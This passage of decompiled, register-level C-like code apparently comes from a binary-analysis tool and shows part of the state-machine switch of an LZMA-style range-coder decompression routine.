                                                                                                                                                                            							goto L88;
                                                                                                                                                                            						case 0xb:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								__ecx =  *(__ebp - 0x24);
                                                                                                                                                                            								__eax =  *(__ebp - 0x20);
                                                                                                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x28);
                                                                                                                                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            							L88:
                                                                                                                                                                            							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            							goto L89;
                                                                                                                                                                            						case 0xc:
                                                                                                                                                                            							L99:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							_t334 = __ebp - 0x70;
                                                                                                                                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            							__eflags =  *_t334;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            							goto L101;
                                                                                                                                                                            						case 0xd:
                                                                                                                                                                            							L37:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            								 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							_t122 = __ebp - 0x70;
                                                                                                                                                                            							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            							__eflags =  *_t122;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							L39:
                                                                                                                                                                            							__eax =  *(__ebp - 0x40);
                                                                                                                                                                            							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                            								goto L48;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = __ebx - 0x100;
                                                                                                                                                                            							if(__ebx >= 0x100) {
                                                                                                                                                                            								goto L54;
                                                                                                                                                                            							}
                                                                                                                                                                            							L41:
                                                                                                                                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                            							 *(__ebp - 0x48) = __eax;
                                                                                                                                                                            							__eax = __eax + 1;
                                                                                                                                                                            							__eax = __eax << 8;
                                                                                                                                                                            							__eax = __eax + __ebx;
                                                                                                                                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            							__edx = __ax & 0x0000ffff;
                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                            								 *(__ebp - 0x40) = 1;
                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            								0x800 = 0x800 - __edx;
                                                                                                                                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            								goto L39;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L37;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 0xe:
                                                                                                                                                                            							L46:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            								 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							_t156 = __ebp - 0x70;
                                                                                                                                                                            							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            							__eflags =  *_t156;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								L48:
                                                                                                                                                                            								__eflags = __ebx - 0x100;
                                                                                                                                                                            								if(__ebx >= 0x100) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eax =  *(__ebp - 0x58);
                                                                                                                                                                            								__edx = __ebx + __ebx;
                                                                                                                                                                            								__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            								__esi = __edx + __eax;
                                                                                                                                                                            								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            								__ax =  *__esi;
                                                                                                                                                                            								 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            								__edi = __ax & 0x0000ffff;
                                                                                                                                                                            								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            								if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            									__cx = __ax;
                                                                                                                                                                            									_t170 = __edx + 1; // 0x1
                                                                                                                                                                            									__ebx = _t170;
                                                                                                                                                                            									__cx = __ax >> 5;
                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                            									 *__esi = __ax;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            									0x800 = 0x800 - __edi;
                                                                                                                                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            									__ebx = __ebx + __ebx;
                                                                                                                                                                            									 *__esi = __cx;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L46;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							L54:
                                                                                                                                                                            							_t173 = __ebp - 0x34;
                                                                                                                                                                            							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                            							__eflags =  *_t173;
                                                                                                                                                                            							goto L55;
                                                                                                                                                                            						case 0xf:
                                                                                                                                                                            							L58:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            								 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							_t203 = __ebp - 0x70;
                                                                                                                                                                            							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            							__eflags =  *_t203;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							L60:
                                                                                                                                                                            							__eflags = __ebx - 0x100;
                                                                                                                                                                            							if(__ebx >= 0x100) {
                                                                                                                                                                            								L55:
                                                                                                                                                                            								__al =  *(__ebp - 0x44);
                                                                                                                                                                            								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                            								goto L56;
                                                                                                                                                                            							}
                                                                                                                                                                            							L61:
                                                                                                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                                                                                                            							__edx = __ebx + __ebx;
                                                                                                                                                                            							__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                            								_t217 = __edx + 1; // 0x1
                                                                                                                                                                            								__ebx = _t217;
                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            								goto L60;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L58;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 0x10:
                                                                                                                                                                            							L109:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							_t365 = __ebp - 0x70;
                                                                                                                                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            							__eflags =  *_t365;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							goto L111;
                                                                                                                                                                            						case 0x11:
                                                                                                                                                                            							goto L69;
                                                                                                                                                                            						case 0x12:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								__eax =  *(__ebp - 0x58);
                                                                                                                                                                            								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                            								goto L132;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            							__eflags = __eax;
                                                                                                                                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                            							goto L130;
                                                                                                                                                                            						case 0x13:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            								_t469 = __ebp - 0x58;
                                                                                                                                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                            								__eflags =  *_t469;
                                                                                                                                                                            								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                            								 *(__ebp - 0x40) = 8;
                                                                                                                                                                            								L144:
                                                                                                                                                                            								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                            								goto L145;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            							 *(__ebp - 0x30) = 8;
                                                                                                                                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                            							L130:
                                                                                                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            							 *(__ebp - 0x40) = 3;
                                                                                                                                                                            							goto L144;
                                                                                                                                                                            						case 0x14:
                                                                                                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                            							__eax =  *(__ebp - 0x80);
                                                                                                                                                                            							goto L140;
                                                                                                                                                                            						case 0x15:
                                                                                                                                                                            							__eax = 0;
                                                                                                                                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            							__al = __al & 0x000000fd;
                                                                                                                                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            							goto L120;
                                                                                                                                                                            						case 0x16:
                                                                                                                                                                            							__eax =  *(__ebp - 0x30);
                                                                                                                                                                            							__eflags = __eax - 4;
                                                                                                                                                                            							if(__eax >= 4) {
                                                                                                                                                                            								_push(3);
                                                                                                                                                                            								_pop(__eax);
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 4);
                                                                                                                                                                            							 *(__ebp - 0x40) = 6;
                                                                                                                                                                            							__eax = __eax << 7;
                                                                                                                                                                            							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            							goto L145;
                                                                                                                                                                            						case 0x17:
                                                                                                                                                                            							L145:
                                                                                                                                                                            							__eax =  *(__ebp - 0x40);
                                                                                                                                                                            							 *(__ebp - 0x50) = 1;
                                                                                                                                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                            							goto L149;
                                                                                                                                                                            						case 0x18:
                                                                                                                                                                            							L146:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							_t484 = __ebp - 0x70;
                                                                                                                                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            							__eflags =  *_t484;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            							L148:
                                                                                                                                                                            							_t487 = __ebp - 0x48;
                                                                                                                                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            							__eflags =  *_t487;
                                                                                                                                                                            							L149:
                                                                                                                                                                            							__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            							if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            								__ecx =  *(__ebp - 0x40);
                                                                                                                                                                            								__ebx =  *(__ebp - 0x50);
                                                                                                                                                                            								0 = 1;
                                                                                                                                                                            								__eax = 1 << __cl;
                                                                                                                                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                            								__eax =  *(__ebp - 0x7c);
                                                                                                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            								goto L140;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eax =  *(__ebp - 0x50);
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                            								__eax = __eax - __ecx;
                                                                                                                                                                            								__edx = __edx + 1;
                                                                                                                                                                            								__eflags = __edx;
                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                            								 *(__ebp - 0x50) = __edx;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            								goto L148;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L146;
                                                                                                                                                                            							}
                                                                                                                                                                            						case 0x19:
                                                                                                                                                                            							__eflags = __ebx - 4;
                                                                                                                                                                            							if(__ebx < 4) {
                                                                                                                                                                            								 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                            								L119:
                                                                                                                                                                            								_t393 = __ebp - 0x2c;
                                                                                                                                                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                            								__eflags =  *_t393;
                                                                                                                                                                            								L120:
                                                                                                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                            								if(__eax == 0) {
                                                                                                                                                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                            									goto L170;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                            								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                            									goto L171;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                            								__eax =  *(__ebp - 0x30);
                                                                                                                                                                            								_t400 = __ebp - 0x60;
                                                                                                                                                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                            								__eflags =  *_t400;
                                                                                                                                                                            								goto L123;
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx = __ebx;
                                                                                                                                                                            							__eax = __ebx;
                                                                                                                                                                            							__ecx = __ebx >> 1;
                                                                                                                                                                            							__eax = __ebx & 0x00000001;
                                                                                                                                                                            							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                            							__al = __al | 0x00000002;
                                                                                                                                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                            							__eflags = __ebx - 0xe;
                                                                                                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            							if(__ebx >= 0xe) {
                                                                                                                                                                            								__ebx = 0;
                                                                                                                                                                            								 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                            								L102:
                                                                                                                                                                            								__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            								if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            									__eax = __eax + __ebx;
                                                                                                                                                                            									 *(__ebp - 0x40) = 4;
                                                                                                                                                                            									 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            									__eax =  *(__ebp - 4);
                                                                                                                                                                            									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                            									L108:
                                                                                                                                                                            									__ebx = 0;
                                                                                                                                                                            									 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            									 *(__ebp - 0x50) = 1;
                                                                                                                                                                            									 *(__ebp - 0x44) = 0;
                                                                                                                                                                            									 *(__ebp - 0x48) = 0;
                                                                                                                                                                            									L112:
                                                                                                                                                                            									__eax =  *(__ebp - 0x40);
                                                                                                                                                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                            										_t391 = __ebp - 0x2c;
                                                                                                                                                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                            										__eflags =  *_t391;
                                                                                                                                                                            										goto L119;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eax =  *(__ebp - 0x50);
                                                                                                                                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            									__eax =  *(__ebp - 0x58);
                                                                                                                                                                            									__esi = __edi + __eax;
                                                                                                                                                                            									 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            									__ax =  *__esi;
                                                                                                                                                                            									__ecx = __ax & 0x0000ffff;
                                                                                                                                                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                            										__ecx = 0;
                                                                                                                                                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                            										__ecx = 1;
                                                                                                                                                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            										__ebx = 1;
                                                                                                                                                                            										__ecx =  *(__ebp - 0x48);
                                                                                                                                                                            										__ebx = 1 << __cl;
                                                                                                                                                                            										__ecx = 1 << __cl;
                                                                                                                                                                            										__ebx =  *(__ebp - 0x44);
                                                                                                                                                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                            										__cx = __ax;
                                                                                                                                                                            										__cx = __ax >> 5;
                                                                                                                                                                            										__eax = __eax - __ecx;
                                                                                                                                                                            										__edi = __edi + 1;
                                                                                                                                                                            										__eflags = __edi;
                                                                                                                                                                            										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            										 *__esi = __ax;
                                                                                                                                                                            										 *(__ebp - 0x50) = __edi;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										 *(__ebp - 0x10) = __edx;
                                                                                                                                                                            										0x800 = 0x800 - __ecx;
                                                                                                                                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            										 *__esi = __dx;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            										L111:
                                                                                                                                                                            										_t368 = __ebp - 0x48;
                                                                                                                                                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                            										__eflags =  *_t368;
                                                                                                                                                                            										goto L112;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										goto L109;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								__ecx =  *(__ebp - 0xc);
                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                            									__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            									__ebx = __ebx | 0x00000001;
                                                                                                                                                                            									__eflags = __ebx;
                                                                                                                                                                            									 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            									L101:
                                                                                                                                                                            									_t338 = __ebp - 0x48;
                                                                                                                                                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            									__eflags =  *_t338;
                                                                                                                                                                            									goto L102;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L99;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
